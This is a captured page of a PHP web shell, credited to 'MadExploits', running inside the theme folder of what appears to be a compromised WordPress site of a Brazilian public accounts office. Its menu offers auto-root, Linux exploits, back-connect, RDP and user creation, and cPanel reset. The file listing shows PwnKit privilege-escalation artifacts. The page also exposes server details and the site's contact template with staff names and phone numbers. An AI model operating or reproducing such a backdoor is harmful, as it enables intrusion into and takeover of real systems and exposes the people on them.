Linux 700ba4e1d92d 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Apache/2.4.67 (Debian)
: 172.18.0.2 | : 216.73.217.30
Cant Read [ /etc/named.conf ]
8.2.31
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
wp-content /
themes /
mpcma-theme /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
template-parts
[ DIR ]
drwxrwxrwx
.DS_Store
6
KB
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
archive-ato_normativo.php
12.96
KB
-rwxrwxrwx
archive-parecer.php
1.24
KB
-rwxrwxrwx
footer.php
3.58
KB
-rwxrwxrwx
front-page.php
7.12
KB
-rwxrwxrwx
functions.php
9.54
KB
-rwxrwxrwx
header.php
2.19
KB
-rwxrwxrwx
home.php
1.27
KB
-rwxrwxrwx
index.php
7.07
KB
-rwxrwxrwx
page-acesso-a-informacao.php
3.61
KB
-rwxrwxrwx
page-contato.php
3.53
KB
-rwxrwxrwx
page-institucional.php
3.79
KB
-rwxrwxrwx
page-mapa-do-site.php
2.51
KB
-rwxrwxrwx
page.php
693
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
screenshot-readme.txt
73
B
-rwxrwxrwx
single.php
876
B
-rwxrwxrwx
style.css
499
B
-rwxrwxrwx
taxonomy-tipo_ato.php
2.64
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page-contato.php
<?php /** * Template Name: Contato */ get_header(); ?> <div class="page-hero"> <h1>Contato</h1> <p class="breadcrumb"><a href="<?php echo home_url(); ?>">Início</a> › Contato</p> </div> <div class="page-content"> <div class="section-page-header"> <svg viewBox="0 0 24 24" style="width:28px;height:28px;fill:var(--ouro);"><path d="M6.62 10.79c1.44 2.83 3.76 5.14 6.59 6.59l2.2-2.2c.27-.27.67-.36 1.02-.24 1.12.37 2.33.57 3.57.57.55 0 1 .45 1 1V20c0 .55-.45 1-1 1-9.39 0-17-7.61-17-17 0-.55.45-1 1-1h3.5c.55 0 1 .45 1 1 0 1.25.2 2.45.57 3.57.11.35.03.74-.25 1.02l-2.2 2.2z"/></svg> <h2>CONTATOS</h2> </div> <!-- Secretaria --> <div class="section-title" style="margin-bottom:16px;"> <svg viewBox="0 0 24 24"><path d="M20 4H4c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h16c1.1 0 2-.9 2-2V6c0-1.1-.9-2-2-2zm0 4l-8 5-8-5V6l8 5 8-5v2z"/></svg> SECRETARIA </div> <div class="contatos-grid" style="margin-bottom:40px;"> <div class="contato-card"> <div class="contato-sigla">SEC/MPC</div> <div class="contato-info"> <h4>Secretaria do Ministério Público de Contas</h4> <span class="contato-tel">📞 2016-6114</span> </div> </div> </div> <!-- Lista de gabinetes --> <div class="section-title" style="margin-bottom:16px;"> <svg viewBox="0 0 24 24"><path d="M12 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0 2c-2.67 0-8 1.34-8 4v2h16v-2c0-2.66-5.33-4-8-4z"/></svg> GABINETES </div> <div class="contato-lista"> <div class="contato-linha"> <div class="contato-badge">GPROC1/JCV</div> <div class="contato-linha-info"> <span class="contato-linha-nome">Jairo Cavalcante Vieira</span> <span class="contato-linha-detalhe">Gabinete do Procurador de Contas · 📞 2016-6095</span> </div> </div> <div class="contato-linha"> <div class="contato-badge">GPROC2/PHAR</div> <div class="contato-linha-info"> <span class="contato-linha-nome">Paulo Henrique Araújo dos Reis</span> <span class="contato-linha-detalhe">Gabinete do Procurador de Contas · 📞 2016-6101</span> </div> </div> <div class="contato-linha"> <div class="contato-badge">GPROC3/DPS</div> <div class="contato-linha-info"> <span class="contato-linha-nome">Douglas Paulo da Silva</span> <span class="contato-linha-detalhe">Gabinete do Procurador de Contas · 📞 2016-6296 / 6096 · <img src="https://mpc.tcema.tc.br/wp-content/uploads/2026/06/whatsapp.png" style="width:16px;height:16px;vertical-align:middle;margin-right:3px;"> 98 8500-3852</span> </div> </div> </div> </div> <style> .contato-lista { display: flex; flex-direction: column; border: 1px solid var(--cinza-borda); border-radius: 6px; overflow: hidden; } .contato-linha { display: flex; align-items: center; gap: 20px; padding: 16px 20px; border-bottom: 1px solid var(--cinza-borda); } .contato-linha:last-child { border-bottom: none; } .contato-linha:hover { background: var(--cinza-claro); } .contato-badge { background: var(--bordo); color: #fff; font-size: 0.78rem; font-weight: 700; padding: 4px 10px; border-radius: 4px; min-width: 100px; text-align: center; letter-spacing: 0.03em; flex-shrink: 0; } .contato-linha-info { display: flex; flex-direction: column; gap: 3px; } .contato-linha-nome { font-weight: 600; font-size: 0.95rem; color: var(--cinza-texto); } .contato-linha-detalhe { font-size: 0.85rem; color: #666; } </style> <?php get_footer(); ?>
Close